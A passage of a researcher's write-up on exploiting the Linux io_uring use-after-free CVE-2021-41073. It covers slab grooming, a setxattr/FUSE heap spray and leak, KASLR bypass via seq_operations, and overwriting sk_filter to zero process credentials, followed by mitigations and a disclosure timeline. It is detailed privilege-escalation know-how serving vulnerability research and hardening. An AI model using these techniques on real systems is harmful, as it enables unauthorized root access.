Though it isn’t necessary to understand the rest of this post, if you want to know more about the internals of the Linux kernel memory allocators check out these great blog posts [ [20]](https://argp.github.io/2012/01/03/linux-kernel-heap-exploitation/) [ [21]](https://ruffell.nz/programming/writeups/2019/02/15/looking-at-kmalloc-and-the-slub-memory-allocator.html)[ [23]](https://hammertux.github.io/slab-allocator) and these slides [ [22]](https://events.static.linuxfound.org/images/stories/pdf/klf2012_kim.pdf).
### Memory Grooming
The first goal is to get contiguously allocated buffers. Given the nature of the bug, the target object for UAF needs to be at a positive offset from the originating `io_buffer` and the offset has to be knowable.
We can start by draining the cache’s freelist and ensuring that a fresh slab page is allocated. Afterwards, subsequent allocations will be contiguous to each other on the same slab page. We do this by triggering the allocation of many 32 byte objects, which can be done by registering many buffers using [`io_uring_prep_provide_buffers`](https://github.com/axboe/liburing/blob/37856ad78b605a388b7ae598a55544c7c6d3abe5/src/include/liburing.h#L635). Remember, an `io_buffer` object will be allocated for each buffer registered.
```
io_uring_prep_provide_buffers(sqe, bufs1, 0x100, 1000, group_id1, 0);
```
The line of code above triggers the allocation of 1000 32 byte `io_buffer` structures in the kernel. They will each stay in memory until they are used to complete an `io_uring` request. That means they can be kept in memory indefinitely.
When the target object is allocated, it should land next to the `io_buffer` structs that were just sprayed. Luckily, provided buffers for each `buf_group` are used in Last-In-First-Out (LIFO) order. So, the first `io_buffer` used for an operation will be the last one that was allocated. Now the offset to the target object is knowable!
![[62254ed6ee34d345b27e6bfb_IOURING_6.png]]
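Here is a small model of why LIFO selection makes the offset knowable. It is only a sketch: the `toy_*` names and the addresses are made up, and it assumes the sprayed `io_buffer` structures and the target object really did land back to back on a fresh slab page.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_OBJ_SIZE 32u
#define TOY_MAX_BUFS 16u

/* Toy buffer group: remembers the kernel address of each io_buffer in the
 * order it was provided, and hands them back last-in-first-out. */
struct toy_group {
    uintptr_t io_buffers[TOY_MAX_BUFS];
    size_t count;
};

/* Register one buffer. Returns 0 on success, -1 if the group is full. */
static int toy_provide(struct toy_group *g, uintptr_t io_buffer_addr)
{
    if (g->count == TOY_MAX_BUFS)
        return -1;
    g->io_buffers[g->count++] = io_buffer_addr;
    return 0;
}

/* Pick the buffer for the next request: the most recently provided one.
 * Returns 0 if the group is empty. */
static uintptr_t toy_select(struct toy_group *g)
{
    return g->count ? g->io_buffers[--g->count] : 0;
}

/* Transfer size that moves the io_buffer pointer exactly onto `target`. */
static size_t toy_len_to_reach(uintptr_t selected, uintptr_t target)
{
    return (size_t)(target - selected);
}
```

If four buffers are sprayed starting at a made-up address `0x1000` and the target is allocated right after them at `0x1080`, the first request uses the `io_buffer` at `0x1060`, so a 32 byte transfer is what points the later `kfree` at the target.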
#### What About CONFIG_SLAB_FREELIST_RANDOM?
The kernel configuration [CONFIG_SLAB_FREELIST_RANDOM](https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_RANDOM.html) (which is set in distributions like Ubuntu) randomizes the order in which buffers get added to the freelist when a new slab page is allocated. This means allocations on a new slab page will not be contiguous in virtual memory.
This mitigation is annoying, but easily bypassable. The first step is the same: spray to ensure an `io_buffer` struct lands in a freshly allocated slab page. Then, spray the cache with target objects. This way, there is a high likelihood of a target object being allocated contiguously to the `io_buffer` that will trigger the freeing. The randomization only applies to the order buffers are added to the freelist - the list itself is still LIFO.
![[622552360461b545e33b7d55_IOURING_9.png]]<p style="text-align: center;"><sub><i>Bypassing CONFIG_SLAB_FREELIST_RANDOM</i></sub></p>
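A back-of-the-envelope model shows why the spray works despite the shuffled freelist. The sketch below makes idealized assumptions that will not hold exactly on a live system: a slab of one 4096 byte page (128 objects of 32 bytes), a spray that fills every other slot on the page, and no competing kernel allocations. All `toy_*` names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>

#define TOY_SLOTS 128u   /* assumed: one 4096 byte page of 32 byte objects */

enum toy_obj { TOY_IO_BUFFER, TOY_TARGET };

/* Lay out one fresh slab page: the io_buffer lands in `io_slot` (wherever the
 * randomized freelist put it) and the spray fills every remaining slot. */
static void toy_fill_page(enum toy_obj page[TOY_SLOTS], unsigned io_slot)
{
    for (unsigned i = 0; i < TOY_SLOTS; i++)
        page[i] = (i == io_slot) ? TOY_IO_BUFFER : TOY_TARGET;
}

/* True if the object directly after the io_buffer is a sprayed target. */
static bool toy_neighbor_is_target(const enum toy_obj page[TOY_SLOTS], unsigned io_slot)
{
    return io_slot + 1 < TOY_SLOTS && page[io_slot + 1] == TOY_TARGET;
}

/* Count, over every slot the io_buffer could land in, how often the
 * next-higher neighbor ends up being a target. */
static unsigned toy_favorable_slots(void)
{
    enum toy_obj page[TOY_SLOTS];
    unsigned hits = 0;

    for (unsigned slot = 0; slot < TOY_SLOTS; slot++) {
        toy_fill_page(page, slot);
        if (toy_neighbor_is_target(page, slot))
            hits++;
    }
    return hits;
}
```

Under these assumptions only the last slot on the page is a miss, so the randomization changes where the `io_buffer` sits but rarely changes what sits next to it.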
#### Linux Kernel Memory Tracking
There are a lot of ways to track Linux kernel memory. I decided to learn at least one of them and chose the [kmem event tracing subsystem](https://www.kernel.org/doc/html/latest/trace/events-kmem.html), which is built using [ftrace](https://www.kernel.org/doc/Documentation/trace/ftrace.txt). I chose it because it seemed to require the least effort. I don’t want to write any code - even one line is too many.
The setup is simple: pass the following in your kernel’s boot parameters:
```trace_event=kmem:kmalloc,kmem:kmem_cache_alloc,kmem:kfree,kmem:kmalloc_node```
and you can trace all memory allocations and frees in the kernel by running:
```cat /sys/kernel/debug/tracing/trace```
To deobfuscate the virtual memory addresses you can add `no_hash_pointers` to the kernel boot parameters.
![[62227aa7f00392b8ec4c9685_tdrjnLMm.png]]
<p style="text-align: center;"><sub><i>Tracking kernel memory</i></sub></p>
The first, second, and third columns represent the task name, pid, and the CPU ID of the calling thread, respectively. On the first line, you can see the buffer that is freed by the bug in `io_put_kbuf` (which is inlined into [`kiocb_done`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L2929) during compilation). The second line shows the attempt to reallocate this freed buffer.
Now with a basic background of how Linux kernel memory and `io_uring` work, can you spot the problem?
The buffer is being freed in a thread running on CPU 0 and the reallocation attempt is happening on CPU 1. Now the problem is obvious! The completion of the `io_uring` read request happens asynchronously, so it happens in the context of an `iou_wrk` thread. The reallocation happens in a thread from our process. Remember that cache slab pages are processor specific, so it’s necessary that the free and reallocation occur on the same CPU.
I already knew, from [Jann Horn](https://twitter.com/tehjh)’s [research](https://googleprojectzero.blogspot.com/2019/01/taking-page-from-kernels-book-tlb-issue.html), that [sched_setaffinity](https://man7.org/linux/man-pages/man2/sched_setaffinity.2.html) can be used to pin a thread to run on a specific CPU core [ [17]](https://googleprojectzero.blogspot.com/2019/01/taking-page-from-kernels-book-tlb-issue.html). Unfortunately, this only applies to threads from our own application. We also need a way to control the [affinity](https://en.wikipedia.org/wiki/Processor_affinity) of the `iou_wrk` thread created by the `io_uring` kernel component.
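Pinning our own thread is the easy half. A minimal sketch using the glibc `sched_setaffinity` wrapper follows; the helper name `pin_to_first_allowed_cpu` is hypothetical, and picking the first allowed CPU is an arbitrary choice for illustration. It does nothing about the kernel worker thread.

```c
#define _GNU_SOURCE
#include <sched.h>

/* Pin the calling thread to the first CPU it is currently allowed to run on.
 * Returns the chosen CPU number, or -1 on failure. */
int pin_to_first_allowed_cpu(void)
{
    cpu_set_t allowed, target;

    if (sched_getaffinity(0, sizeof(allowed), &allowed) != 0)
        return -1;

    for (int cpu = 0; cpu < CPU_SETSIZE; cpu++) {
        if (!CPU_ISSET(cpu, &allowed))
            continue;
        CPU_ZERO(&target);
        CPU_SET(cpu, &target);
        /* A pid of 0 means "the calling thread". */
        if (sched_setaffinity(0, sizeof(target), &target) != 0)
            return -1;
        return cpu;
    }
    return -1;
}
```

Starting from the current affinity mask rather than hard-coding CPU 0 keeps the sketch working inside containers or cpusets where CPU 0 may not be available.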
### Exploring io_uring Features
Because `io_uring` is performance oriented, I looked for a feature that gives the application control over the affinity of `iou_wrk` threads. I got extremely lucky, as this `io_uring` feature was introduced a [few months prior](https://www.spinics.net/lists/io-uring/msg09009.html) - just in time for me to abuse it [ [18]](https://www.spinics.net/lists/io-uring/msg09009.html). Using `IORING_REGISTER_IOWQ_AFF`, you can set the CPU affinity for `iou_wrk` threads. I can pin the thread from my process and the `iou_wrk` thread to the same CPU core, using `sched_setaffinity` and [`io_uring_register_iowq_aff`](https://github.com/axboe/liburing/blob/37856ad78b605a388b7ae598a55544c7c6d3abe5/src/include/liburing.h#L165) respectively.
Now the reallocation works as expected:
![[62279478b5479c5db996d6fe_realloc.png]]<p style="text-align: center;"><sub><i>Victim buffer from invalid free being reallocated</i></sub></p>
Now that a reallocation can be triggered reliably, let’s figure out what to do with it.
### Universal Heap Spray
Once I was able to successfully turn the bug into a UAF, I immediately revisited [Vitaly Nikolenko](https://twitter.com/vnik5287)’s [research](https://duasynt.com/blog/linux-kernel-heap-spray). He created a Linux kernel exploit technique for a universal heap spray using the [setxattr](https://man7.org/linux/man-pages/man2/setxattr.2.html) system call [ [19]](https://duasynt.com/blog/linux-kernel-heap-spray).
This universal heap spray technique provides a way to:
- Allocate an object of any size
- Control the contents of the object
- Keep the object in memory indefinitely
The `setxattr` system call sets the value of an extended attribute associated with a file. When it is executed, the kernel allocates a buffer of a size controlled by the calling user space application (line 10 below) and copies the user provided attributes buffer into it (line 13).
```
static long
setxattr(struct user_namespace *mnt_userns, struct dentry *d,
         const char __user *name, const void __user *value, size_t size,
         int flags)
{
    ...
    if (size) {
        if (size > XATTR_SIZE_MAX)
            return -E2BIG;
        kvalue = kvmalloc(size, GFP_KERNEL);
        if (!kvalue)
            return -ENOMEM;
        if (copy_from_user(kvalue, value, size)) {
            error = -EFAULT;
            goto out;
        }
    ...
    error = vfs_setxattr(mnt_userns, d, kname, kvalue, size, flags);
out:
    kvfree(kvalue);
    return error;
}
```
[userfaultfd](https://man7.org/linux/man-pages/man2/userfaultfd.2.html) allows a user space application to handle page faults, something that would otherwise be handled by the kernel. That means that if the memory pointed to by `value` in the above code is registered with `userfaultfd`, the `copy_from_user` call will block until the application resolves the page fault.
Now imagine mapping two adjacent pages of memory, where the second page has a `userfaultfd` page fault handler set. The value buffer is of size `n`: the first `n-8` bytes are on the first page and the remaining 8 bytes are on the second page. The kernel will handle the page fault of the first page and copy `n-8` bytes into the kernel buffer. Then, it will block for the final 8 bytes waiting for user space to resolve the page fault of the second page.
With this technique, an unprivileged application can allocate a kernel object of size `n` written with `n-8` bytes of controllable data, and the object stays in memory indefinitely.
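The page layout can be sketched in user space as follows. This only illustrates the pointer arithmetic: the helper names `map_two_pages` and `place_value` are hypothetical, and the second page here is ordinary anonymous memory rather than a page that actually blocks, so nothing stalls when it is touched.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#define TAIL_BYTES 8   /* bytes of the value that spill onto the second page */

/* Map two adjacent pages. In the real technique the second page would be the
 * one that blocks on access; here it is plain memory so the layout can be
 * inspected. Returns NULL on failure. */
unsigned char *map_two_pages(void)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    void *base = mmap(NULL, 2 * page, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    return base == MAP_FAILED ? NULL : (unsigned char *)base;
}

/* Place an n-byte value so that its first n-8 bytes end exactly at the page
 * boundary and its last 8 bytes start the second page. Copies the
 * controllable n-8 bytes from payload and returns the pointer that would be
 * handed to setxattr as `value`, or NULL if n does not fit the layout. */
unsigned char *place_value(unsigned char *base, const void *payload, size_t n)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);

    if (n <= TAIL_BYTES || n - TAIL_BYTES > page)
        return NULL;

    unsigned char *value = base + page - (n - TAIL_BYTES);
    memcpy(value, payload, n - TAIL_BYTES);
    return value;
}
```

For a 32-byte object, `place_value(base, payload, 32)` returns a pointer 24 bytes before the page boundary, so the kernel copy covers 24 controlled bytes before it reaches the second page.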
![[622551faa79daff0b74d2a25_iouring_8.png]]
<p style="text-align: center;"><sub><i>Universal heap spray technique</i></sub></p>
### userfaultfd is over, FUSE is in
The Linux kernel now provides a `sysctl` knob to restrict `userfaultfd` for unprivileged users, `vm.unprivileged_userfaultfd`. Most major Linux distributions enable this restriction by default.
However, the same primitive can be achieved by an [unprivileged user](https://twitter.com/tehjh/status/1438330352075001856) using **[FUSE](https://www.kernel.org/doc/html/latest/filesystems/fuse.html) [ [24]](https://twitter.com/tehjh/status/1438330352075001856)**. **FUSE** provides a framework for implementing a filesystem in user space. What does this mean for exploitation? Reads and writes on files in a **FUSE** filesystem are forwarded to a user space application. By using a memory mapping of a **FUSE** file, we can block the kernel while it copies to or from user space.
Instead of mapping two pages and setting a `userfaultfd` fault handler on the second page, we create one anonymous mapping and one file mapping, using the `addr` parameter of [mmap](https://man7.org/linux/man-pages/man2/mmap.2.html) to ensure the two pages are contiguous in memory.
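One way to get the two mappings adjacent is sketched below. The helper name `map_anon_then_file` is hypothetical, and `fd` is assumed to be an open, readable and writable file at least one page long; in the technique above it would refer to a file on a FUSE mount we control, but any regular file shows the layout. Reserving both pages first and then replacing the second one with `MAP_FIXED` is one possible approach, not necessarily how the original exploit does it.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

/* Build [anonymous page][file-backed page] at adjacent addresses.
 * Returns the address of the first page, or NULL on failure. */
unsigned char *map_anon_then_file(int fd)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);

    /* Reserve two pages so the kernel picks a free range for us. */
    unsigned char *base = mmap(NULL, 2 * page, PROT_READ | PROT_WRITE,
                               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED)
        return NULL;

    /* Replace the second page with the file mapping through the addr
     * argument. MAP_FIXED is safe here because we own the range. */
    void *second = mmap(base + page, page, PROT_READ | PROT_WRITE,
                        MAP_SHARED | MAP_FIXED, fd, 0);
    if (second == MAP_FAILED) {
        munmap(base, 2 * page);
        return NULL;
    }
    return base;
}
```

The first access to the second page is then served from the file, which for a FUSE file means our own user space handler decides when that access completes.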
### Universal Object Overwrite
The universal heap spray technique is perfect for use-after-frees. After the object has been freed, `setxattr` will trigger the allocation of the object of size `n`, overwrite the first `n-8` bytes, and then block. Since we successfully turned the vulnerability into a use-after-free primitive, we’ll use this to overwrite arbitrary objects in memory that are allocated from the `kmalloc-32` cache.
### Universal Heap Leak - A New Technique
Before thinking about types of objects to overwrite, an information leak technique is needed to find where things are in memory (function addresses, credential structures, heap pointers, etc). I realized I could turn the aforementioned technique from a universal heap spray primitive into a universal heap leak primitive with this one weird trick. In the original UAF use case for this technique, `setxattr` reallocates a buffer that has already been freed. But what if the `setxattr` buffer is freed instead?
### One Weird Trick
First, use the heap spray technique: call `setxattr`, which blocks while copying the last 8 bytes from user space. At this point most of the data has already been copied over to the allocated kernel buffer. In another thread, trigger the freeing of the `setxattr` buffer, using the bug. Then, trigger the allocation of the object to leak. This should reallocate and overwrite the kernel buffer that `setxattr` is using to store attribute data. Finally, unblock `setxattr`. Now the kernel will use the data in `kvalue` (line 10) to set the file attribute. Extended file attributes are stored as binary data. To get an extended attribute of a file, we can use `setxattr`'s counterpart - `getxattr`. Remember, when the attribute is set, the kernel buffer used is overwritten with the data from the new object.
![[62265f37876402371e98f237_IOURING_10 (1).png]]<p style="text-align: center;"><sub><i>Universal heap leak technique</i></sub></p>
So, the contents of the object can be leaked by calling `getxattr`:
```
setxattr("lol.txt", "user.lol", xattr_buf, 32, 0);
getxattr("lol.txt", "user.lol", leakbuf, 32);
```
### Target Objects
So far I’ve only spoken about general techniques. We haven’t picked what objects we want to use along with the techniques. I haven’t seen the objects I chose used in other exploits, so hopefully it can provide ideas for exploiting a tough cache like `kmalloc-32`.
When first looking for objects, I looked within `io_uring` itself. There are a lot of interesting objects, many of which contain pointers to `cred` and `task_struct` structures. I had not seen other kernel exploits utilizing `io_uring` objects until recently, when I came across a [blog post](https://ruia-ruia.github.io/NFC-UAF/) by [Awarau](https://twitter.com/Awarau1) [ [25]](https://ruia-ruia.github.io/NFC-UAF/).
I used a couple of other strategies to find target objects as well. One was using Linux kernel memory tracing on a test machine and seeing what 32-byte objects are allocated. I also wrote a [quick script](https://github.com/chompie1337/kernel_obj_finder) using [pahole](https://linux.die.net/man/1/pahole) to output all of the structures of a specific size. One trick I learned from [Alexander Popov](https://twitter.com/a13xp0p0v)’s [blog post](https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html) is to enable features that are common across many distros, which increases the number of kernel objects available [ [26]](https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html).
#### Objects To Leak:
**io_tctx_node**:
An [`io_tctx_node`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L890) structure is allocated for a new thread that sends an `io_uring` request. There can be multiple `io_tctx_node`s in a single process if multiple threads call into `io_uring`. The field to leak is `task`, a pointer to the thread’s `task_struct`. The allocation of this object can be triggered by creating a new thread and making an `io_uring` system call.
**io_buffer:**
The [`io_buffer`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L258) structure is covered at length in the vulnerability section. The field to leak is `list`, a `list_head` structure that links the buffer to the rest of the buffers in the `buf_group`. Leaking this gives the relative position on the slab, so the address of the sprayed objects can be calculated. I later realized this object could also be used to build an arbitrary free primitive, by modifying the list members and unregistering multiple buffers. This is just a thought; this technique wasn’t used in this exploit.
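As a rough sketch of how a leaked `list` pointer translates into a slab position: the struct below is a user-space mirror of the 32-byte `io_buffer` layout on x86-64, and the helper names `slab_base` and `slab_slot` are hypothetical. The sketch assumes `kmalloc-32` slabs are a single 4 KiB page, which should be checked against the target kernel.

```c
#include <stdint.h>

/* User-space mirror of the kernel's 32-byte struct io_buffer on x86-64,
 * with the list_head flattened into two 64-bit pointers. */
struct io_buffer_leak {
    uint64_t list_next;   /* list.next */
    uint64_t list_prev;   /* list.prev */
    uint64_t addr;
    uint32_t len;
    uint16_t bid;
};
_Static_assert(sizeof(struct io_buffer_leak) == 32,
               "expected a kmalloc-32 sized object");

#define ASSUMED_SLAB_SIZE 4096u   /* assumption: one 4 KiB page per slab */
#define OBJ_SIZE          32u

/* Base address of the slab page that holds the object at kaddr. */
uint64_t slab_base(uint64_t kaddr)
{
    return kaddr & ~(uint64_t)(ASSUMED_SLAB_SIZE - 1);
}

/* Index of that object among the 128 slots of the page. */
unsigned int slab_slot(uint64_t kaddr)
{
    return (unsigned int)((kaddr & (ASSUMED_SLAB_SIZE - 1)) / OBJ_SIZE);
}
```

Given a leaked pointer such as `0xffff888012345a60` (a made-up value), `slab_base` yields `0xffff888012345000` and `slab_slot` yields 83, from which the addresses of neighbouring 32-byte slots follow by simple arithmetic.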
**seq_operations:**
A [`seq_operations`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/seq_file.h#L31) structure is allocated when a process opens a [seq_file](https://www.kernel.org/doc/html/latest/filesystems/seq_file.html). This structure stores the pointers to functions that do sequential operations on the file. Opening `/proc/cmdline` triggers the allocation of this structure. Leaking this object gives pointers to several functions. In particular, I use the function [`single_next`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/seq_file.c#L596) to break [KASLR](https://dev.to/satorutakeuchi/a-brief-description-of-aslr-and-kaslr-2bbp).
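Turning the leaked bytes into a kernel base address is a single subtraction. In the sketch below, `seq_operations_leak` mirrors the four function pointers of `seq_operations` on x86-64. `SINGLE_NEXT_OFFSET` is a placeholder value, not a real offset: it depends on the exact kernel build and would come from that build's symbols. The helper name `kernel_base_from_leak` is hypothetical as well.

```c
#include <stdint.h>
#include <string.h>

/* User-space mirror of struct seq_operations on x86-64: four function
 * pointers, 32 bytes in total. */
struct seq_operations_leak {
    uint64_t start;
    uint64_t stop;
    uint64_t next;    /* single_next for files opened via single_open() */
    uint64_t show;
};

/* Placeholder offset of single_next from the kernel text base. This value is
 * made up for illustration and must be replaced per kernel build. */
#define SINGLE_NEXT_OFFSET 0x34f2f0ULL

/* Recover the randomized kernel text base from a 32-byte getxattr leak. */
uint64_t kernel_base_from_leak(const unsigned char leakbuf[32])
{
    struct seq_operations_leak ops;

    memcpy(&ops, leakbuf, sizeof(ops));
    return ops.next - SINGLE_NEXT_OFFSET;
}
```

Every other kernel symbol can then be located as the recovered base plus that symbol's own build-specific offset.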
#### Object to Overwrite:
**sk_filter:**
An [`sk_filter`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/filter.h#L593) structure is allocated when an already loaded [eBPF](https://chompie.rip/Blog+Posts/Kernel+Pwning+with+eBPF+-+a+Love+Story) program is attached to a socket. Of particular interest is the field `prog`, which contains a pointer to a [`bpf_prog`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/filter.h#L563) structure that represents the attached eBPF program. By overwriting this pointer, we gain kernel execution. One thing to note: because `prog` is the last field in `sk_filter`, it is not covered by the `n-8` bytes we can write to using the mentioned techniques. However, this is easily fixable. Instead of blocking in `setxattr`, we call `getxattr` immediately after and block. The `setxattr` kernel buffer will be reallocated in `getxattr`, and will be completely overwritten with the desired contents before blocking in `copy_to_user`.
### Putting It all Together
As stated above, we gain execution by overwriting the `prog` pointer in an `sk_filter`. A `bpf_prog` structure has a field [`bpf_func`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/filter.h#L584) which contains a pointer to the function that gets called when the associated socket has data written to it. When the function is called, the second parameter contains a pointer to the `bpf_prog` field `insns`, which is an array of BPF instructions that is used by the eBPF interpreter.
At this point, there are a few options:
The first option is to set the `bpf_func` field to [`bpf_prog_run`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/kernel/bpf/core.c#L1373), the function that decodes and executes BPF instructions when the program is not JIT compiled, and then place eBPF bytecode instructions that overwrite creds in the `insns` array. This is an option even if eBPF JIT is configured. However, if the Kconfig [`CONFIG_BPF_JIT_ALWAYS_ON`](https://cateee.net/lkddb/web-lkddb/BPF_JIT_ALWAYS_ON.html) is set, the interpreter is not compiled into the kernel.
Another option is to look for [ROP](https://en.wikipedia.org/wiki/Return-oriented_programming) gadgets in the kernel to call instead. This idea was inspired by [Alexander Popov](https://twitter.com/a13xp0p0v)’s original exploit for [CVE-2021-26708](https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html) [ [26]](https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html).
We need a gadget that will:
1. Dereferences the `insns` pointer, where we place the pointer `&task_struct→cred`
2. Writes 0 to the `uid` offset
3. Writes 0 to the `euid` offset
4. Returns
It’s possible to derive the exit value of an eBPF program, so we can first leak the address to `task→cred` and repeat the process with the `uid` and `euid` overwrites. With a leak, the operations can be split up into two ROP gadgets. This gives some flexibility on what gadgets can be used, and increases the likelihood of the kernel containing the necessary gadgets.
There are many other ways to exploit this bug. I came up with a few more ideas while writing this blog post. Can you think of any more?
## Demo
<iframe width="100%" height="500" src="https://www.youtube.com/embed/qkyt6Kb0swk" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
Find the proof-of-concept (PoC) exploit code along with a test VM [here.](https://github.com/chompie1337/Linux_LPE_io_uring_CVE-2021-41073)
## Mitigations
The `io_uring` subsystem introduces a large and rapidly growing kernel code base that is reachable as an unprivileged user. It’s a system call interface, so it is inherently hard to sandbox; we depend on system call filtering for sandboxing, e.g. [seccomp](https://en.wikipedia.org/wiki/Seccomp) and [SELinux](https://en.wikipedia.org/wiki/Security-Enhanced_Linux). `io_uring` redefines how user space interacts with the kernel, and is accessible as an unprivileged user on kernels >= 5.1, which includes a growing number of Android devices. Additionally, you need to enable `CONFIG_EXPERT` in the kernel to even have the option to disable it. For these reasons, I believe `io_uring` is going to have an important impact on the future of Linux-related security.
I’ll present mitigations that offer some protection against the exploit techniques I’ve outlined in this post, and discuss their effectiveness. I’ll also present some considerations for the future of Linux kernel hardening.
### Existing Mitigations
First I’ll cover the mitigations for which I’ve already discussed bypasses:
[CONFIG_SLAB_FREELIST_RANDOM](https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_RANDOM.html) randomizes the order in which buffers get added to the freelist when a new slab page is allocated. This mitigation is helpful for heap overflow bugs that may depend on contiguous object allocation to be exploitable. However, I don’t believe it is particularly effective for UAF or vulnerabilities giving a controllable free. As Jann Horn notes in [this Linux kernel exploitation writeup](https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html), if you can control the order of what gets freed, then you can control the freelist, and the randomization is nullified [ [27]](https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html). There is a low performance cost to this mitigation, as the randomization only occurs when a new slab page is allocated.
[CONFIG_BPF_JIT_ALWAYS_ON](https://cateee.net/lkddb/web-lkddb/BPF_JIT_ALWAYS_ON.html) removes the eBPF interpreter from the kernel. The intent of this mitigation is to reduce the number of usable exploitation gadgets. While I’ve discussed a number of bypasses in the context of this exploit, it should always be set if eBPF JIT is enabled. As a mitigation, it comes at no cost performance wise and removes a potential primitive for attackers.
### Some additional suggestions:
[CONFIG_BPF_UNPRIV_DEFAULT_OFF](https://cateee.net/lkddb/web-lkddb/BPF_UNPRIV_DEFAULT_OFF.html) turns off eBPF for unprivileged users by default. This can be modified via a `sysctl` knob while the system is running. Whether this mitigation is appropriate will depend on whether your system needs to let unprivileged users run eBPF programs. If not, turning off eBPF for unprivileged users reduces attack surface in terms of exploiting eBPF itself, as well as making eBPF unavailable to use as a primitive, as shown in this exploit. While this mitigation won’t directly affect the exploitability of this vulnerability, it does block a very useful primitive. This will force an attacker to be more creative and come up with another way to gain kernel execution or read/write abilities.
[CONFIG_SLAB_FREELIST_HARDENED](https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_HARDENED.html) checks whether a free object’s metadata is valid. This mitigation will not protect against any of the techniques shown in this writeup, but it blocks other primitives that can be built with the vulnerability. For example, if a kernel buffer is blocking for a user copy and then freed, the freelist metadata can be overwritten after the copy is unblocked, and an attacker has control over the pointer of the next free object. This type of freelist control primitive is blocked by this mitigation, which first checks whether the free object is actually within a valid slab page before allowing it to be allocated. There are some minor performance costs that come with performing a check for every freed object.
### Future Considerations
Implementing [control flow integrity](https://en.wikipedia.org/wiki/Control-flow_integrity) for eBPF programs would block several of the techniques discussed in this post. When an eBPF program is verified and JIT compiled, the official entry point can be added to a list of valid targets that is checked before a program is run. This would block the previously discussed general ROP technique, the JIT smuggling technique, as well as the interpreter technique (if JIT is turned on).
The next consideration, while not a mitigation, is a simple but fundamental measure to improve software security. The vulnerability exploited in this post would have easily been found if basic unit tests were written for the `IORING_OP_PROVIDE_BUFFERS` feature. It was only after the second exploitable vulnerability in this feature was reported that any tests were [committed](https://github.com/axboe/liburing/commit/d06c81aa3c170b586b09a88ebcd2c04f3106bd44) [ [32]](https://github.com/axboe/liburing/commit/d06c81aa3c170b586b09a88ebcd2c04f3106bd44). Because of the rapid growth in both system call support and features of `io_uring` in the upstream kernel, it is important to provide accompanying tests so that easily findable vulnerabilities like this one don’t slip by.
## Security Disclosure Timeline
**9/8/2021:** I find the vulnerability. I write a PoC to make sure my assumptions are correct.
**9/11/2021:** I disclose the vulnerability to [email protected] and share the PoC.
**9/11/2021:** Report is forwarded to `io_uring` developers and acknowledged.
**9/11/2021:** A potential patch is provided.
**9/12/2021:** I review and test the patch. I confirm it fixes the issue. Jens asks me what email I want to use for my “Reported By Tag”. I respond with my work email, to which he is apprehensive because the domain name makes it obvious the patch is a security issue. I give my personal email instead, which he accepts.
**9/13/2021:** [Greg K-H](https://twitter.com/gregkh) responds to my initial report, in which I state that I want to coordinate disclosure with the linux-distros mailing list so downstream consumers can apply the patch. He says since most distros sync on stable releases, it is not necessary to get the distro list involved. I don’t get the distro list involved.
**9/13/2021:** I apply for a CVE via [Mitre](https://cve.mitre.org/). CVE-2021-41073 is reserved.
**9/18/2021:** The patch hits upstream and is backported to affected versions. I send out a [disclosure](https://www.openwall.com/lists/oss-security/2021/09/18/2) via the oss-security mailing list.
## Reflection on the Linux Kernel and Security Fixes
First, I was impressed with the short time it took to go from initial report to pushing a fix. It’s no secret that the Linux kernel community can be somewhat caustic to newcomers, but everyone that I interacted with was (mostly) cordial.
The reporting process, however, is confusing. The official guide is out of date and inconsistent, and it seems that everyone that has reported kernel vulnerabilities does so a bit differently. For the most part, everyone emails the linux-distros mailing list, and sometimes a CVE ID is reserved that way. In my case though, I did not contact the linux-distros list because Greg said it wasn’t necessary. Submitting patches is also done via mailing list (so, sent via email). The whole process is hard to understand, compared to modern ways of issue tracking. [This recent blog post](https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/#including-a-patch) contains the relevant information that I wish I had available at the time [ [29]](https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/#including-a-patch).
